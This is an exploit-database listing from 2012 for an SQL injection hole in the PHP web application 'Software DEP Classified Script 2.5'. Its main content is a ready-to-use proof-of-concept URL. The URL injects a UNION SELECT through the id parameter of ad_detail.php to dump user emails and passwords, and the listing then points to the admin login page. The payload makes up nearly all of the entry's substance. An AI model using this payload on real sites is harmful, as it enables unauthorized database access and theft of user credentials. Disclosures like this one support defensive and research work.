-
hordcode security on April 12, 2012
- Platforms
- php
- Category
- webapps
- Tags
- vulnerability script classified injection software
- Source
- exploit-db.com
- Download
-
Exploit Code
Vulnerable App
Software DEP Classified Script 2.5 SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Software DEP Classified Script 2.5 SQL Injection Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Author: h0rd Contact: h0rd[at]null.net homepage: http://h0rd.net download: http://www.softwaredep.com/classified-script.html Price: $199 PoC exploit: http://[host]/ad_detail.php?id=null union select 1,2,3,4,concat(email,0x3a,0x3a,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19 from user-- login page: http://[host]/[script]/admin/
Comments
blog comments powered by Disqus